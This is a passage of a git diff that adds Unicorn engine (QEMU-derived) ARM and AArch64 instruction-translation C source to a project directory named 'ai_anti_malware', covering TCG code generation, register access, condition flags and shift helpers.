DISAS_EXC; + break; + } + + disas_a64_insn(env, dc); + + if (tcg_check_temp_count()) { + fprintf(stderr, "TCG temporary leak before "TARGET_FMT_lx"\n", + dc->pc); + } + + /* Translation stops when a conditional branch is encountered. + * Otherwise the subsequent code could get translated several times. + * Also stop translation when a page boundary is reached. This + * ensures prefetch aborts occur at the right place. 
+ */ + num_insns++; + } while (!dc->is_jmp && tcg_ctx->gen_opc_ptr < gen_opc_end && + !cs->singlestep_enabled && + !dc->ss_active && + dc->pc < next_page_start && + num_insns < max_insns); + + /* if too long translation, save this info */ + if (tcg_ctx->gen_opc_ptr >= gen_opc_end || num_insns >= max_insns) { + block_full = true; + } + + //if (tb->cflags & CF_LAST_IO) { + // gen_io_end(); + //} + +tb_end: + if (unlikely(cs->singlestep_enabled || dc->ss_active) + && dc->is_jmp != DISAS_EXC) { + /* Note that this means single stepping WFI doesn't halt the CPU. + * For conditional branch insns this is harmless unreachable code as + * gen_goto_tb() has already handled emitting the debug exception + * (and thus a tb-jump is not possible when singlestepping). + */ + assert(dc->is_jmp != DISAS_TB_JUMP); + if (dc->is_jmp != DISAS_JUMP) { + gen_a64_set_pc_im(dc, dc->pc); + } + if (cs->singlestep_enabled) { + gen_exception_internal(dc, EXCP_DEBUG); + } else { + gen_step_complete_exception(dc); + } + } else { + switch (dc->is_jmp) { + case DISAS_NEXT: + gen_goto_tb(dc, 1, dc->pc); + break; + default: + case DISAS_UPDATE: + gen_a64_set_pc_im(dc, dc->pc); + /* fall through */ + case DISAS_JUMP: + /* indicate that the hash table must be used to find the next TB */ + tcg_gen_exit_tb(tcg_ctx, 0); + break; + case DISAS_TB_JUMP: + case DISAS_EXC: + case DISAS_SWI: + break; + case DISAS_WFE: + gen_a64_set_pc_im(dc, dc->pc); + gen_helper_wfe(tcg_ctx, tcg_ctx->cpu_env); + break; + case DISAS_WFI: + /* This is a special case because we don't want to just halt the CPU + * if trying to debug across a WFI. 
+ */ + gen_a64_set_pc_im(dc, dc->pc); + gen_helper_wfi(tcg_ctx, tcg_ctx->cpu_env); + break; + } + } + +done_generating: + gen_tb_end(tcg_ctx, tb, num_insns); + *tcg_ctx->gen_opc_ptr = INDEX_op_end; + + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + lj++; + while (lj <= j) { + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } + } else { + tb->size = dc->pc - pc_start; + tb->icount = num_insns; + } + + env->uc->block_full = block_full; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.c new file mode 100644 index 0000000..f172b33 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.c @@ -0,0 +1,11633 @@ +/* + * ARM translation + * + * Copyright (c) 2003 Fabrice Bellard + * Copyright (c) 2005-2007 CodeSourcery + * Copyright (c) 2007 OpenedHand, Ltd. + * Copyright (c) 2015 Nguyen Anh Quynh (Unicorn engine) + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ +#include +#include +#include +#include +#include "unicorn/platform.h" + +#include "cpu.h" +#include "internals.h" +#include "tcg-op.h" +#include "qemu/log.h" +#include "qemu/bitops.h" +#include "arm_ldst.h" + +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +#include "exec/gen-icount.h" + +#define ENABLE_ARCH_4T arm_dc_feature(s, ARM_FEATURE_V4T) +#define ENABLE_ARCH_5 arm_dc_feature(s, ARM_FEATURE_V5) +/* currently all emulated v5 cores are also v5TE, so don't bother */ +#define ENABLE_ARCH_5TE arm_dc_feature(s, ARM_FEATURE_V5) +#define ENABLE_ARCH_5J 0 +#define ENABLE_ARCH_6 arm_dc_feature(s, ARM_FEATURE_V6) +#define ENABLE_ARCH_6K arm_dc_feature(s, ARM_FEATURE_V6K) +#define ENABLE_ARCH_6T2 arm_dc_feature(s, ARM_FEATURE_THUMB2) +#define ENABLE_ARCH_7 arm_dc_feature(s, ARM_FEATURE_V7) +#define ENABLE_ARCH_8 arm_dc_feature(s, ARM_FEATURE_V8) + +#define ARCH(x) do { if (!ENABLE_ARCH_##x) goto illegal_op; } while(0) + +#include "translate.h" + +#if defined(CONFIG_USER_ONLY) +#define IS_USER(s) 1 +#else +#define IS_USER(s) (s->user) +#endif + +#ifdef CONFIG_USER_ONLY +static TCGv_i64 cpu_exclusive_test; +static TCGv_i32 cpu_exclusive_info; +#endif + + +static const char *regnames[] = + { "r0", "r1", "r2", "r3", "r4", "r5", "r6", "r7", + "r8", "r9", "r10", "r11", "r12", "r13", "r14", "pc" }; + +/* initialize TCG globals. 
*/ +void arm_translate_init(struct uc_struct *uc) +{ + int i; + TCGContext *tcg_ctx = uc->tcg_ctx; + + tcg_ctx->cpu_env = tcg_global_reg_new_ptr(uc->tcg_ctx, TCG_AREG0, "env"); + + for (i = 0; i < 16; i++) { + tcg_ctx->cpu_R[i] = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, regs[i]), + regnames[i]); + } + tcg_ctx->cpu_CF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, CF), "CF"); + tcg_ctx->cpu_NF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, NF), "NF"); + tcg_ctx->cpu_VF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, VF), "VF"); + tcg_ctx->cpu_ZF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, ZF), "ZF"); + + tcg_ctx->cpu_exclusive_addr = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_addr), "exclusive_addr"); + tcg_ctx->cpu_exclusive_val = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_val), "exclusive_val"); +#ifdef CONFIG_USER_ONLY + cpu_exclusive_test = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_test), "exclusive_test"); + cpu_exclusive_info = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_info), "exclusive_info"); +#endif + + a64_translate_init(uc); +} + +static inline TCGv_i32 load_cpu_offset(struct uc_struct *uc, int offset) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offset); + return tmp; +} + +#define load_cpu_field(uc, name) load_cpu_offset(uc, offsetof(CPUARMState, name)) + +static inline void store_cpu_offset(TCGContext *tcg_ctx, TCGv_i32 var, int offset) +{ + tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); + tcg_temp_free_i32(tcg_ctx, var); +} + +#define store_cpu_field(s, var, name) \ + store_cpu_offset(s, var, offsetof(CPUARMState, name)) + +/* Set a variable to the value of a CPU register. 
*/ +static void load_reg_var(DisasContext *s, TCGv_i32 var, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (reg == 15) { + uint32_t addr; + /* normally, since we updated PC, we need only to add one insn */ + if (s->thumb) + addr = (long)s->pc + 2; + else + addr = (long)s->pc + 4; + tcg_gen_movi_i32(tcg_ctx, var, addr); + } else { + tcg_gen_mov_i32(tcg_ctx, var, tcg_ctx->cpu_R[reg & 0x0f]); + } +} + +/* Create a new temporary and set it to the value of a CPU register. */ +static inline TCGv_i32 load_reg(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + load_reg_var(s, tmp, reg); + return tmp; +} + +/* Set a CPU register. The source must be a temporary and will be + marked as dead. */ +static void store_reg(DisasContext *s, int reg, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (reg == 15) { + tcg_gen_andi_i32(tcg_ctx, var, var, ~1); + s->is_jmp = DISAS_JUMP; + } + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_R[reg & 0x0f], var); + tcg_temp_free_i32(tcg_ctx, var); +} + +/* Value extensions. */ +#define gen_uxtb(var) tcg_gen_ext8u_i32(tcg_ctx, var, var) +#define gen_uxth(var) tcg_gen_ext16u_i32(tcg_ctx, var, var) +#define gen_sxtb(var) tcg_gen_ext8s_i32(tcg_ctx, var, var) +#define gen_sxth(var) tcg_gen_ext16s_i32(tcg_ctx, var, var) + +#define gen_sxtb16(var) gen_helper_sxtb16(tcg_ctx, var, var) +#define gen_uxtb16(var) gen_helper_uxtb16(tcg_ctx, var, var) + + +static inline void gen_set_cpsr(DisasContext *s, TCGv_i32 var, uint32_t mask) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp_mask = tcg_const_i32(tcg_ctx, mask); + gen_helper_cpsr_write(tcg_ctx, tcg_ctx->cpu_env, var, tmp_mask); + tcg_temp_free_i32(tcg_ctx, tmp_mask); +} +/* Set NZCV flags from the high 4 bits of var. 
*/ +#define gen_set_nzcv(s, var) gen_set_cpsr(s, var, CPSR_NZCV) + +static void gen_exception_internal(DisasContext *s, int excp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); + + assert(excp_is_internal(excp)); + gen_helper_exception_internal(tcg_ctx, tcg_ctx->cpu_env, tcg_excp); + tcg_temp_free_i32(tcg_ctx, tcg_excp); +} + +static void gen_exception(DisasContext *s, int excp, uint32_t syndrome) // qq +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); + TCGv_i32 tcg_syn = tcg_const_i32(tcg_ctx, syndrome); + + gen_helper_exception_with_syndrome(tcg_ctx, tcg_ctx->cpu_env, tcg_excp, tcg_syn); + tcg_temp_free_i32(tcg_ctx, tcg_syn); + tcg_temp_free_i32(tcg_ctx, tcg_excp); +} + +static void gen_ss_advance(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* If the singlestep state is Active-not-pending, advance to + * Active-pending. + */ + if (s->ss_active) { + s->pstate_ss = 0; + gen_helper_clear_pstate_ss(tcg_ctx, tcg_ctx->cpu_env); + } +} + +static void gen_step_complete_exception(DisasContext *s) +{ + /* We just completed step of an insn. Move from Active-not-pending + * to Active-pending, and then also take the swstep exception. + * This corresponds to making the (IMPDEF) choice to prioritize + * swstep exceptions over asynchronous exceptions taken to an exception + * level where debug is disabled. This choice has the advantage that + * we do not need to maintain internal state corresponding to the + * ISV/EX syndrome bits between completion of the step and generation + * of the exception, and our syndrome information is always correct. 
+ */ + gen_ss_advance(s); + gen_exception(s, EXCP_UDEF, syn_swstep(s->ss_same_el, 1, s->is_ldex)); + s->is_jmp = DISAS_EXC; +} + +static void gen_smul_dual(DisasContext *s, TCGv_i32 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ext16s_i32(tcg_ctx, tmp1, a); + tcg_gen_ext16s_i32(tcg_ctx, tmp2, b); + tcg_gen_mul_i32(tcg_ctx, tmp1, tmp1, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_gen_sari_i32(tcg_ctx, a, a, 16); + tcg_gen_sari_i32(tcg_ctx, b, b, 16); + tcg_gen_mul_i32(tcg_ctx, b, b, a); + tcg_gen_mov_i32(tcg_ctx, a, tmp1); + tcg_temp_free_i32(tcg_ctx, tmp1); +} + +/* Byteswap each halfword. */ +static void gen_rev16(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, tmp, var, 8); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0x00ff00ff); + tcg_gen_shli_i32(tcg_ctx, var, var, 8); + tcg_gen_andi_i32(tcg_ctx, var, var, 0xff00ff00); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +/* Byteswap low halfword and sign extend. */ +static void gen_revsh(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_ext16u_i32(tcg_ctx, var, var); + tcg_gen_bswap16_i32(tcg_ctx, var, var); + tcg_gen_ext16s_i32(tcg_ctx, var, var); +} + +/* Unsigned bitfield extract. */ +static void gen_ubfx(DisasContext *s, TCGv_i32 var, int shift, uint32_t mask) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (shift) + tcg_gen_shri_i32(tcg_ctx, var, var, shift); + tcg_gen_andi_i32(tcg_ctx, var, var, mask); +} + +/* Signed bitfield extract. 
*/ +static void gen_sbfx(DisasContext *s, TCGv_i32 var, int shift, int width) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t signbit; + + if (shift) + tcg_gen_sari_i32(tcg_ctx, var, var, shift); + if (shift + width < 32) { + signbit = 1u << (width - 1); + tcg_gen_andi_i32(tcg_ctx, var, var, (1u << width) - 1); + tcg_gen_xori_i32(tcg_ctx, var, var, signbit); + tcg_gen_subi_i32(tcg_ctx, var, var, signbit); + } +} + +/* Return (b << 32) + a. Mark inputs as dead */ +static TCGv_i64 gen_addq_msw(DisasContext *s, TCGv_i64 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp64 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_extu_i32_i64(tcg_ctx, tmp64, b); + tcg_temp_free_i32(tcg_ctx, b); + tcg_gen_shli_i64(tcg_ctx, tmp64, tmp64, 32); + tcg_gen_add_i64(tcg_ctx, a, tmp64, a); + + tcg_temp_free_i64(tcg_ctx, tmp64); + return a; +} + +/* Return (b << 32) - a. Mark inputs as dead. */ +static TCGv_i64 gen_subq_msw(DisasContext *s, TCGv_i64 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp64 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_extu_i32_i64(tcg_ctx, tmp64, b); + tcg_temp_free_i32(tcg_ctx, b); + tcg_gen_shli_i64(tcg_ctx, tmp64, tmp64, 32); + tcg_gen_sub_i64(tcg_ctx, a, tmp64, a); + + tcg_temp_free_i64(tcg_ctx, tmp64); + return a; +} + +/* 32x32->64 multiply. Marks inputs as dead. 
*/ +static TCGv_i64 gen_mulu_i64_i32(DisasContext *s, TCGv_i32 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 lo = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 hi = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 ret; + + tcg_gen_mulu2_i32(tcg_ctx, lo, hi, a, b); + tcg_temp_free_i32(tcg_ctx, a); + tcg_temp_free_i32(tcg_ctx, b); + + ret = tcg_temp_new_i64(tcg_ctx); + tcg_gen_concat_i32_i64(tcg_ctx, ret, lo, hi); + tcg_temp_free_i32(tcg_ctx, lo); + tcg_temp_free_i32(tcg_ctx, hi); + + return ret; +} + +static TCGv_i64 gen_muls_i64_i32(DisasContext *s, TCGv_i32 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 lo = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 hi = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 ret; + + tcg_gen_muls2_i32(tcg_ctx, lo, hi, a, b); + tcg_temp_free_i32(tcg_ctx, a); + tcg_temp_free_i32(tcg_ctx, b); + + ret = tcg_temp_new_i64(tcg_ctx); + tcg_gen_concat_i32_i64(tcg_ctx, ret, lo, hi); + tcg_temp_free_i32(tcg_ctx, lo); + tcg_temp_free_i32(tcg_ctx, hi); + + return ret; +} + +/* Swap low and high halfwords. */ +static void gen_swap_half(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, tmp, var, 16); + tcg_gen_shli_i32(tcg_ctx, var, var, 16); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +/* Dual 16-bit add. Result placed in t0 and t1 is marked as dead. 
+ tmp = (t0 ^ t1) & 0x8000; + t0 &= ~0x8000; + t1 &= ~0x8000; + t0 = (t0 + t1) ^ tmp; + */ + +static void gen_add16(DisasContext *s, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0x8000); + tcg_gen_andi_i32(tcg_ctx, t0, t0, ~0x8000); + tcg_gen_andi_i32(tcg_ctx, t1, t1, ~0x8000); + tcg_gen_add_i32(tcg_ctx, t0, t0, t1); + tcg_gen_xor_i32(tcg_ctx, t0, t0, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, t1); +} + +/* Set CF to the top bit of var. */ +static void gen_set_CF_bit31(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, var, 31); +} + +/* Set N and Z flags from var. */ +static inline void gen_logic_CC(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, var); + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, var); +} + +/* T0 += T1 + CF. */ +static void gen_adc(DisasContext *s, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_add_i32(tcg_ctx, t0, t0, t1); + tcg_gen_add_i32(tcg_ctx, t0, t0, tcg_ctx->cpu_CF); +} + +/* dest = T0 + T1 + CF. */ +static void gen_add_carry(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_add_i32(tcg_ctx, dest, t0, t1); + tcg_gen_add_i32(tcg_ctx, dest, dest, tcg_ctx->cpu_CF); +} + +/* dest = T0 - T1 + CF - 1. */ +static void gen_sub_carry(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_sub_i32(tcg_ctx, dest, t0, t1); + tcg_gen_add_i32(tcg_ctx, dest, dest, tcg_ctx->cpu_CF); + tcg_gen_subi_i32(tcg_ctx, dest, dest, 1); +} + +/* dest = T0 + T1. 
Compute C, N, V and Z flags */ +static void gen_add_CC(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0, tmp, t1, tmp); + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); + tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); + tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); +} + +/* dest = T0 + T1 + CF. Compute C, N, V and Z flags */ +static void gen_adc_CC(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + if (TCG_TARGET_HAS_add2_i32) { + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0, tmp, tcg_ctx->cpu_CF, tmp); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t1, tmp); + } else { + TCGv_i64 q0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 q1 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, q0, t0); + tcg_gen_extu_i32_i64(tcg_ctx, q1, t1); + tcg_gen_add_i64(tcg_ctx, q0, q0, q1); + tcg_gen_extu_i32_i64(tcg_ctx, q1, tcg_ctx->cpu_CF); + tcg_gen_add_i64(tcg_ctx, q0, q0, q1); + tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, q0); + tcg_temp_free_i64(tcg_ctx, q0); + tcg_temp_free_i64(tcg_ctx, q1); + } + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); + tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); + tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); +} + +/* dest = T0 - T1. 
Compute C, N, V and Z flags */ +static void gen_sub_CC(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp; + tcg_gen_sub_i32(tcg_ctx, tcg_ctx->cpu_NF, t0, t1); + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_setcond_i32(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_CF, t0, t1); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); + tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); +} + +/* dest = T0 + ~T1 + CF. Compute C, N, V and Z flags */ +static void gen_sbc_CC(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_not_i32(tcg_ctx, tmp, t1); + gen_adc_CC(s, dest, t0, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +#define GEN_SHIFT(name) \ +static void gen_##name(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv_i32 tmp1, tmp2, tmp3; \ + tmp1 = tcg_temp_new_i32(tcg_ctx); \ + tcg_gen_andi_i32(tcg_ctx, tmp1, t1, 0xff); \ + tmp2 = tcg_const_i32(tcg_ctx, 0); \ + tmp3 = tcg_const_i32(tcg_ctx, 0x1f); \ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GTU, tmp2, tmp1, tmp3, tmp2, t0); \ + tcg_temp_free_i32(tcg_ctx, tmp3); \ + tcg_gen_andi_i32(tcg_ctx, tmp1, tmp1, 0x1f); \ + tcg_gen_##name##_i32(tcg_ctx, dest, tmp2, tmp1); \ + tcg_temp_free_i32(tcg_ctx, tmp2); \ + tcg_temp_free_i32(tcg_ctx, tmp1); \ +} +GEN_SHIFT(shl) +GEN_SHIFT(shr) +#undef GEN_SHIFT + +static void gen_sar(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp1, tmp2; + tmp1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp1, t1, 0xff); + tmp2 = tcg_const_i32(tcg_ctx, 0x1f); + tcg_gen_movcond_i32(tcg_ctx, 
TCG_COND_GTU, tmp1, tmp1, tmp2, tmp2, tmp1); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_gen_sar_i32(tcg_ctx, dest, t0, tmp1); + tcg_temp_free_i32(tcg_ctx, tmp1); +} + +static void tcg_gen_abs_i32(DisasContext *s, TCGv_i32 dest, TCGv_i32 src) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 c0 = tcg_const_i32(tcg_ctx, 0); + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_neg_i32(tcg_ctx, tmp, src); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GT, dest, src, c0, src, tmp); + tcg_temp_free_i32(tcg_ctx, c0); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +static void shifter_out_im(DisasContext *s, TCGv_i32 var, int shift) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (shift == 0) { + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_CF, var, 1); + } else { + tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, var, shift); + if (shift != 31) { + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, 1); + } + } +} + +/* Shift by immediate. Includes special handling for shift == 0. */ +static inline void gen_arm_shift_im(DisasContext *s, TCGv_i32 var, int shiftop, + int shift, int flags) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (shiftop) { + case 0: /* LSL */ + if (shift != 0) { + if (flags) + shifter_out_im(s, var, 32 - shift); + tcg_gen_shli_i32(tcg_ctx, var, var, shift); + } + break; + case 1: /* LSR */ + if (shift == 0) { + if (flags) { + tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, var, 31); + } + tcg_gen_movi_i32(tcg_ctx, var, 0); + } else { + if (flags) + shifter_out_im(s, var, shift - 1); + tcg_gen_shri_i32(tcg_ctx, var, var, shift); + } + break; + case 2: /* ASR */ + if (shift == 0) + shift = 32; + if (flags) + shifter_out_im(s, var, shift - 1); + if (shift == 32) + shift = 31; + tcg_gen_sari_i32(tcg_ctx, var, var, shift); + break; + case 3: /* ROR/RRX */ + if (shift != 0) { + if (flags) + shifter_out_im(s, var, shift - 1); + tcg_gen_rotri_i32(tcg_ctx, var, var, shift); break; + } else { + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shli_i32(tcg_ctx, tmp, 
tcg_ctx->cpu_CF, 31); + if (flags) + shifter_out_im(s, var, 0); + tcg_gen_shri_i32(tcg_ctx, var, var, 1); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } + } +} + +static inline void gen_arm_shift_reg(DisasContext *s, TCGv_i32 var, int shiftop, + TCGv_i32 shift, int flags) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (flags) { + switch (shiftop) { + case 0: gen_helper_shl_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; + case 1: gen_helper_shr_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; + case 2: gen_helper_sar_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; + case 3: gen_helper_ror_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; + } + } else { + switch (shiftop) { + case 0: + gen_shl(s, var, var, shift); + break; + case 1: + gen_shr(s, var, var, shift); + break; + case 2: + gen_sar(s, var, var, shift); + break; + case 3: tcg_gen_andi_i32(tcg_ctx, shift, shift, 0x1f); + tcg_gen_rotr_i32(tcg_ctx, var, var, shift); break; + } + } + tcg_temp_free_i32(tcg_ctx, shift); +} + +#define PAS_OP(pfx) \ + switch (op2) { \ + case 0: gen_pas_helper(glue(pfx,add16)); break; \ + case 1: gen_pas_helper(glue(pfx,addsubx)); break; \ + case 2: gen_pas_helper(glue(pfx,subaddx)); break; \ + case 3: gen_pas_helper(glue(pfx,sub16)); break; \ + case 4: gen_pas_helper(glue(pfx,add8)); break; \ + case 7: gen_pas_helper(glue(pfx,sub8)); break; \ + } +static void gen_arm_parallel_addsub(DisasContext *s, int op1, int op2, TCGv_i32 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + 